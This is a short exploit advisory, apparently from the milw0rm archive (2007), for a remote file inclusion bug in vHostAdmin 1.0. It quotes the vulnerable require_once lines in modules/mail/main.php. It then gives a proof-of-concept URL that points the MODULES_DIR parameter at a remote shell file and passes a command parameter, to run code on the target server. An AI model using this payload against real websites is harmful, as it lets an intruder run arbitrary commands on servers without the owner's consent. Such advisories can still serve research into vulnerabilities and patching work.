29 lines
No EOL
1.6 KiB
Text
29 lines
No EOL
1.6 KiB
Text
_________________________________
|
|
________| |________
|
|
\ | Dr Max Virus | /
|
|
\ | | /
|
|
/ |_________________________________| \
|
|
/___________) (___________\
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Script:vHostAdmin
|
|
Affected Version:1.0
|
|
Risk:Highly Critical
|
|
Downlaoad:http://www.inter7.com/vhostadmin/vhostadmin-cvs-1112134662.tar.gz
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Author:Dr Max Virus
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Bug in (modules/mail/main.php)
|
|
Vul Code;
|
|
require_once($MODULES_DIR . '/mail/domains.php');
|
|
require_once($MODULES_DIR . '/mail/users.php');
|
|
require_once($MODULES_DIR . '/mail/forwards.php');
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
POC:
|
|
http://[target]/[path]/modules/mail/main.php?MODULES_DIR=shell.txt?&cmd=0wn3d
|
|
By Dr Max Virus;
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
|
|
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2007-01-24] |